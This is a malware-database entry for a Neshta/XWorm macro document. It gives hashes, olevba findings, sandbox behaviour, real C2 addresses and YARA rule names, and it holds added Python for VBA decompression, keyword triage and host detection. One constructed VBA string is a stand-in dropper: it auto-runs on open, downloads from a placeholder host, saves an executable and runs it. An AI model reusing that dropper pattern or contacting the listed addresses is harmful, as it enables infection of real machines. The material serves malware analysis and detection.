MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 a68f76c530a51ddd6e3c6983f202054ae462530ab40fdd16ea44eff9af02d3c5. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Signature: Neshta
Vendor detections: 12
Maldoc score: 21

SHA256 hash: a68f76c530a51ddd6e3c6983f202054ae462530ab40fdd16ea44eff9af02d3c5
SHA3-384 hash: 2ee1b3026a45f97333030cb4e0f1c6b683948a7e85451b9f22617e0f949a29380832d842b40e2eb31580444f9133e3e0
SHA1 hash: fce3fba907a3f90c9e8b12c07acd2d425f63c99a
MD5 hash: a3e4e2316df53998a2c6880091610713
humanhash: south-april-pip-alaska
File name: Draft PO Contract Agreement.docm
Signature: Neshta
File size: 16'198 bytes
First seen: 2024-03-02 17:29:24 UTC
Last seen: Never
File type: Word file docm
MIME type: application/vnd.openxmlformats-officedocument.wordprocessingml.document
ssdeep: 384:/imt83c45meRs7GsfIumMC78M2q26akwLWdxdVlwEBJTE:/LZNeRxsfu8M2q7akw6LV77E
TLSH: T17272BF3CCB11FC61E293417B922E0AE1F36D1203839C3DAF1889BA98D655687179E7CD
TrID:
  53.0% (.DOCM) Word Microsoft Office Open XML Format document (with Macro) (52000/1/9)
  23.9% (.DOCX) Word Microsoft Office Open XML Format document (23500/1/4)
  17.8% (.ZIP) Open Packaging Conventions container (17500/1/4)
  4.0% (.ZIP) ZIP compressed archive (4000/1)
  1.0% (.PG/BIN) PrintFox/Pagefox bitmap (640x800) (1000/1)
Reporter: abuse_ch
Tags: docm Neshta

Office OLE Information


This malware sample appears to be an Office document. The following tables provide more information about this document, obtained with oletools (oleid, oledump and olevba).

OLE id
Maldoc score: 21

OLE dump

MalwareBazaar was able to identify 6 sections in this file using oledump (five are listed below):

Section ID   Section size   Section name
A1           371 bytes      PROJECT
A2           41 bytes       PROJECTwm
A3           3231 bytes     VBA/ThisDocument
A4           2543 bytes     VBA/_VBA_PROJECT
A5           514 bytes      VBA/dir
OLE vba

MalwareBazaar was able to extract and deobfuscate VBA script(s) from the OLE objects embedded in this file using olevba, yielding the following information:

Type         Keyword                Description
AutoExec     AutoOpen               Runs when the Word document is opened
IOC          107.175.3.10           IPv4 address
IOC          Apex_Vortex_20240229   Executable file name
Suspicious   Open                   May open a file
Suspicious   write                  May write to a file (if combined with Open)
Suspicious   binary                 May read or write a binary file (if combined with Open)
Suspicious   ADODB.Stream           May create a text file
Suspicious   SaveToFile             May create a text file
Suspicious   Shell                  May run an executable file or a system command
Suspicious   vbNormalFocus          May run an executable file or a system command
Suspicious   Create                 May execute file or a system command through WMI
Suspicious   CreateObject           May create an OLE object
Suspicious   Hex Strings            Hex-encoded strings were detected, may be used to obfuscate strings (option --decode to see all)
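The olevba table above comes from two steps: the VBA source inside word/vbaProject.bin (the OLE file whose streams oledump listed as A1 to A5) is stored compressed with the MS-OVBA container format and has to be decompressed, and the recovered text is then scanned for keywords and IOC patterns. What follows is an added example, not MalwareBazaar's or oletools' code, that implements both steps on constructed input: an MS-OVBA (section 2.4.1) decompressor and a keyword/IOC triage whose categories mirror the table. Locating the module stream inside the CFB container (via VBA/dir and the text offset it records) is assumed to have been done already with oledump or olefile; the compressed container and the VBA source below are constructed for the example and are not taken from this sample.

```python
# Added example (not MalwareBazaar's or oletools' code): decompress an MS-OVBA
# module stream and run an olevba-style keyword triage over the recovered source.
import re


def decompress_vba(data: bytes) -> bytes:
    """MS-OVBA 2.4.1 CompressedContainer: a 0x01 signature byte, then chunks of a
    2-byte header plus tokens that decode to at most 4096 bytes each."""
    if not data or data[0] != 0x01:
        raise ValueError("not a compressed VBA container")
    out = bytearray()
    pos = 1
    while pos + 1 < len(data):
        header = int.from_bytes(data[pos:pos + 2], "little")
        if (header >> 12) & 0b111 != 0b011:
            raise ValueError("bad chunk signature")
        chunk_end = min(pos + (header & 0x0FFF) + 3, len(data))
        compressed = bool(header & 0x8000)
        pos += 2
        chunk_start = len(out)           # copy offsets never reach back past this
        if not compressed:               # stored chunk: 4096 raw bytes follow
            out += data[pos:pos + 4096]
            pos = chunk_end
            continue
        while pos < chunk_end:
            flags = data[pos]
            pos += 1
            for bit in range(8):
                if pos >= chunk_end:
                    break
                if not (flags >> bit) & 1:   # literal token: one raw byte
                    out.append(data[pos])
                    pos += 1
                    continue
                token = int.from_bytes(data[pos:pos + 2], "little")
                pos += 2
                # The offset/length bit split grows with the amount already
                # decompressed in this chunk (at least 4 offset bits).
                difference = len(out) - chunk_start
                bit_count = max(4, (difference - 1).bit_length())
                length = (token & (0xFFFF >> bit_count)) + 3
                offset = (token >> (16 - bit_count)) + 1
                for _ in range(length):      # byte-wise so overlapping copies work
                    out.append(out[-offset])
    return bytes(out)


# Keyword table modelled on the categories olevba reports for this sample.
KEYWORDS = [
    ("AutoExec", "AutoOpen", "Runs when the Word document is opened"),
    ("Suspicious", "Open", "May open a file"),
    ("Suspicious", "Write", "May write to a file (if combined with Open)"),
    ("Suspicious", "ADODB.Stream", "May create a text file"),
    ("Suspicious", "SaveToFile", "May create a text file"),
    ("Suspicious", "Shell", "May run an executable file or a system command"),
    ("Suspicious", "vbNormalFocus", "May run an executable file or a system command"),
    ("Suspicious", "CreateObject", "May create an OLE object"),
]
IPV4_RE = re.compile(rb"\b(?:\d{1,3}\.){3}\d{1,3}\b")
EXE_RE = re.compile(rb"\b[\w\-]+\.(?:exe|dll|scr|bat|cmd|vbs|ps1)\b", re.IGNORECASE)
HEX_RE = re.compile(rb"(?:[0-9A-Fa-f]{2}){8,}")  # 8+ hex-encoded bytes in a row


def triage_vba(source: bytes) -> list:
    """Return de-duplicated (type, keyword, description) triples, olevba-table style."""
    hits = []
    for typ, kw, desc in KEYWORDS:
        if re.search(rb"\b" + re.escape(kw.encode()) + rb"\b", source, re.IGNORECASE):
            hits.append((typ, kw, desc))
    for m in IPV4_RE.finditer(source):
        hits.append(("IOC", m.group().decode(), "IPv4 address"))
    for m in EXE_RE.finditer(source):
        hits.append(("IOC", m.group().decode(), "Executable file name"))
    if HEX_RE.search(source):
        hits.append(("Suspicious", "Hex Strings", "Hex-encoded strings were detected"))
    return list(dict.fromkeys(hits))


# Hand-assembled container (constructed for this example) that decompresses to
# "Sub AutoOpen()\r\nSub AutoClose()\r\n", using one copy token for "Sub Auto".
SAMPLE_CONTAINER = bytes([
    0x01,                  # container signature
    0x1E, 0xB0,            # header 0xB01E: compressed, signature 0b011, size-3 = 30
    0x00, *b"Sub Auto",    # flag byte 0x00 -> eight literal tokens
    0x00, *b"Open()\r\n",  # eight more literals; 16 bytes decompressed so far
    0x01, 0x05, 0xF0,      # bit 0 set -> copy token 0xF005: offset 16, length 8
    *b"Close()",           # bits 1..7 clear -> seven literals
    0x00, *b"\r\n",        # last flag byte, two literals, chunk ends
])

# Constructed VBA source (not this sample's macro) carrying the same tell-tales.
SAMPLE_SOURCE = (
    b'Sub AutoOpen()\r\n'
    b'    Set s = CreateObject("ADODB.Stream"): s.Open: s.Type = 1\r\n'
    b'    s.Write Fetch("http://192.0.2.10/x")\r\n'
    b'    s.SaveToFile Environ("TEMP") & "\\payload_20240229.exe", 2\r\n'
    b'    h = "4D5A90000300000004000000FFFF0000"\r\n'
    b'    Shell Environ("TEMP") & "\\payload_20240229.exe", vbNormalFocus\r\n'
    b'End Sub\r\n'
)
```

On a real document, feed decompress_vba the bytes of a module stream (VBA/ThisDocument here) starting at the text offset recorded in the dir stream, then pass the result to triage_vba; olevba's --decode option additionally shows what the hex-encoded strings in the last table row decode to, which this triage only flags.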

Intelligence


File Origin
# of uploads: 1
# of downloads: 1'977
Origin country: NL

Vendor Threat Intelligence
Verdict: Malicious
File type: application/octet-stream
Has a screenshot: False
Contains macros: False

Result
Verdict: Malware
Maliciousness:

Behaviour
Searching for the window
Creating a window
Creating synchronization primitives
Using the Windows Management Instrumentation requests
Creating a file
Creating a file in the %temp% subdirectories
Changing an executable file
Modifying an executable file
DNS request
Connection attempt
Sending a custom TCP request
Connection attempt to an infection source by exploiting the app vulnerability
Sending a TCP request to an infection source by exploiting the app vulnerability
Creating a process from a recently created file
Infecting executable files
Result
Verdict: Malicious
File Type: Word File with Macro
Payload URLs:
  URL            File name
  107.175.3.10   ThisDocument

Behaviour
BlacklistAPI detected

Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: anti-vm dropper expand fingerprint lolbin macros macros-on-open phishing redcap remote shell32
Result
Verdict: MALICIOUS
Details
Macro with Startup Hook: Detected macro logic that will automatically execute on document open. Most malware contains some execution hook.
Macro with File System Write: Detected macro logic that can write data to the file system.
IPv4 Dotted Quad URL: A URL was detected referencing a direct IP address, as opposed to a domain name.
Macro Contains Suspicious String: Detected a macro with a suspicious string. Suspicious strings include privileged function calls, obfuscations, odd registry keys, etc.
Result
Threat name: Neshta, XWorm
Detection: malicious
Classification: spre.troj.spyw.expl.evad
Score: 100 / 100
Signature
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Antivirus detection for URL or domain
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Creates an undocumented autostart registry key
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with hexadecimal encoded strings
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Document exploit detected (process start blacklist hit)
Drops executable to a common third party application directory
Drops executables to the windows directory (C:\Windows) and starts them
Drops PE files with a suspicious file extension
Found malware configuration
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office process drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample is not signed and drops a device driver
Sample uses string decryption to hide its real strings
Searches for Windows Mail specific files
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Snort IDS alert for network traffic
Yara detected Neshta
Yara detected XWorm
Behaviour
Behavior Graph ID 1401936 (sample: Draft PO Contract Agreement.docm; start date: 02/03/2024; architecture: WINDOWS; score: 100), rendered here as text:

Root signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Found malware configuration; 26 other signatures

WINWORD.EXE
    network: 107.175.3.10 (ports 443, 49162, 49169; AS-COLOCROSSINGUS, United States)
    dropped: C:\...\Apex_Vortex_20240229085748832.exe (PE32)
    signatures: Document exploit detected (creates forbidden files)
    Apex_Vortex_20240229085748832.exe
        dropped: C:\Windows\svchost.com (PE32); C:\...\Apex_Vortex_20240229085748832.exe (PE32+); C:\ProgramData\...\vcredist_x86.exe (PE32); 81 other malicious files
        signatures: Multi AV Scanner detection for dropped file; Creates an undocumented autostart registry key; Drops PE files with a suspicious file extension; 3 other signatures
        Apex_Vortex_20240229085748832.exe
            network: 104.219.238.14 (ports 49170, 7000; DATAWAGONUS, United States); part-0012.t-0009.t-msedge.net 13.107.246.40 (ports 443, 49165, 49173; MICROSOFT-CORP-MSN-AS-BLOCKUS, United States); 11 other IPs or domains
            dropped: C:\ProgramData\system.exe (PE32+)
            signatures: Multi AV Scanner detection for dropped file; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
svchost.com
    dropped: C:\Windows\directx.sys (ASCII)
    signatures: Multi AV Scanner detection for dropped file; Sample is not signed and drops a device driver
    system.exe
        network: webwsasnmaprdipv46.suninggslb.cn; shed.dual-low.part-0012.t-0009.t-msedge.net; 9 other IPs or domains
svchost.com
    system.exe
        network: 172.67.17.71 (ports 443, 49182; CLOUDFLARENETUS, United States); webwsasnmaprdipv46.suninggslb.cn; 10 other IPs or domains
Threat name: Document-Word.Trojan.Valyria
Status: Malicious
First seen: 2024-02-29 17:25:41 UTC
File Type: Document
Extracted files: 20
AV detection: 18 of 24 (75.00%)
Threat level: 5/5

Result
Malware family:
Score: 10/10
Tags: family:neshta macro persistence spyware stealer
Behaviour
Checks processor information in registry
Enumerates system info in registry
Modifies Internet Explorer settings
Modifies registry class
Script User-Agent
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Office loads VBA resources, possible macro or embedded object present
Enumerates physical storage devices
Drops file in Program Files directory
Drops file in Windows directory
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
Modifies system executable filetype association
Reads user/profile data of web browsers
Downloads MZ/PE file
Detect Neshta payload
Neshta
Please note that we are no longer able to provide a coverage score for VirusTotal.
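Three observations recur across the vendor reports above: WINWORD.EXE starting the dropped Apex_Vortex executable from a user-writable location, a PE named svchost.com plus an ASCII directx.sys written to C:\Windows, and a modified executable file-type association. The last is Neshta's persistence technique: the exefile\shell\open\command handler is commonly reported as being rewritten to `%SystemRoot%\svchost.com "%1" %*`, so every .exe launch runs the infector first, which is also why the behaviour graph shows svchost.com as the parent of system.exe. The block below is an added example, not MalwareBazaar's or any sandbox vendor's code, that encodes these as checks over constructed host events; the event shape, user name and directory paths are assumptions. It also shows why "Sample is not signed and drops a device driver" deserves a second look: directx.sys is reported as ASCII, so it is a data file rather than a driver, and judging dropped files by magic bytes instead of extension catches both that and the .com-named PE.

```python
# Added example (not MalwareBazaar's or any sandbox vendor's code): checks for the
# behaviours the reports above attribute to this chain, run over constructed host
# events. Event shape, user name and directory paths are assumptions.
import re

# Default data of HKLM\SOFTWARE\Classes\exefile\shell\open\command on a clean host.
# Neshta is commonly reported to prepend %SystemRoot%\svchost.com to it, so every
# .exe launch runs the infector first (matching svchost.com -> system.exe above).
CLEAN_EXEFILE_COMMAND = '"%1" %*'
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
USER_WRITABLE = re.compile(
    r"^c:\\(?:users\\[^\\]+\\appdata\\|programdata\\|windows\\temp\\)", re.IGNORECASE)
PE_EXTENSIONS = {".exe", ".dll", ".sys", ".scr", ".ocx", ".cpl"}


def _split(path: str):
    """Return (folder, file name), both lower-cased, from a Windows path."""
    folder, _, name = path.rpartition("\\")
    return folder.lower(), name.lower()


def check_office_child(ev: dict):
    """'Suspicious Microsoft Office Child Process': an Office parent launching an
    image from a user-writable directory (the dropper's position in the graph above)."""
    parent = _split(ev["parent"])[1]
    if parent in OFFICE_PARENTS and USER_WRITABLE.match(ev["image"]):
        return f"office child process: {parent} -> {ev['image']}"
    return None


def check_exefile_hijack(ev: dict):
    """Any non-default exefile open command is persistence, whatever it points at."""
    key = ev["key"].lower()
    if key.endswith("\\classes\\exefile\\shell\\open\\command") \
            and ev["data"].strip() != CLEAN_EXEFILE_COMMAND:
        return f"exefile handler hijacked: {ev['data']}"
    return None


def check_dropped_file(ev: dict):
    """Judge a dropped file by magic bytes rather than extension: a PE with a
    non-PE extension (svchost.com) and a '.sys' that is plain text are both odd."""
    folder, name = _split(ev["path"])
    ext = name[name.rfind("."):] if "." in name else ""
    is_pe = ev["head"][:2] == b"MZ"
    if is_pe and ext not in PE_EXTENSIONS:
        return f"PE with suspicious extension: {ev['path']}"
    if ext == ".sys" and not is_pe:
        return f"'.sys' that is not a PE (data file, not a driver): {ev['path']}"
    if is_pe and folder == "c:\\windows":
        return f"PE dropped directly into the Windows directory: {ev['path']}"
    return None


CHECKS = {"process": check_office_child,
          "registry": check_exefile_hijack,
          "file": check_dropped_file}


def evaluate(events: list) -> list:
    """Return one alert string per matching event, in input order."""
    alerts = []
    for ev in events:
        verdict = CHECKS[ev["type"]](ev)
        if verdict:
            alerts.append(verdict)
    return alerts


# Constructed events mirroring the process tree and drops reported above. The
# dropper's directory is truncated in the report, so a stand-in path is used.
SAMPLE_EVENTS = [
    {"type": "process",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Users\victim\AppData\Local\Temp\Apex_Vortex_20240229085748832.exe"},
    {"type": "file", "path": r"C:\Windows\svchost.com", "head": b"MZ\x90\x00"},
    {"type": "file", "path": r"C:\Windows\directx.sys", "head": b"1.0\r\nC:\\"},
    {"type": "registry", "key": r"HKLM\SOFTWARE\Classes\exefile\shell\open\command",
     "data": r'%SystemRoot%\svchost.com "%1" %*'},
    # Benign noise: a browser updater, the default handler, a genuine driver.
    {"type": "process",
     "parent": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "image": r"C:\Program Files\Google\Update\GoogleUpdate.exe"},
    {"type": "registry", "key": r"HKLM\SOFTWARE\Classes\exefile\shell\open\command",
     "data": '"%1" %*'},
    {"type": "file", "path": r"C:\Windows\System32\drivers\tcpip.sys", "head": b"MZ\x90\x00"},
]

if __name__ == "__main__":
    for alert in evaluate(SAMPLE_EVENTS):
        print(alert)
```

The exefile check deliberately compares against the clean default rather than looking for the string svchost.com: Neshta's value is the one reported for this family, but any handler other than `"%1" %*` means something is interposing itself on every executable launch and should be investigated the same way.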

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: BitcoinAddress
Author: Didier Stevens (@DidierStevens)
Description: Contains a valid Bitcoin address

Rule name: DebuggerCheck__API
Reference: https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara

Rule name: DebuggerException__SetConsoleCtrl
Reference: https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara

Rule name: maldoc_getEIP_method_1
Author: Didier Stevens (https://DidierStevens.com)

Rule name: malware_shellcode_hash
Author: JPCERT/CC Incident Response Group
Description: detect shellcode api hash value

Rule name: meth_get_eip
Author: Willi Ballenthin

Rule name: office_document_vba
Author: Jean-Philippe Teissier / @Jipe_
Description: Office document with embedded VBA
Reference: https://github.com/jipegit/

Rule name: vbaproject_bin
Author: CD_R0M_
Description: {76 62 61 50 72 6f 6a 65 63 74 2e 62 69 6e} is hex for vbaproject.bin. Macros are often used by threat actors. Work in progress - Ran out of time

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Malspam: Neshta
Word file docm a68f76c530a51ddd6e3c6983f202054ae462530ab40fdd16ea44eff9af02d3c5 (this sample)

Delivery method: Distributed via e-mail attachment

Comments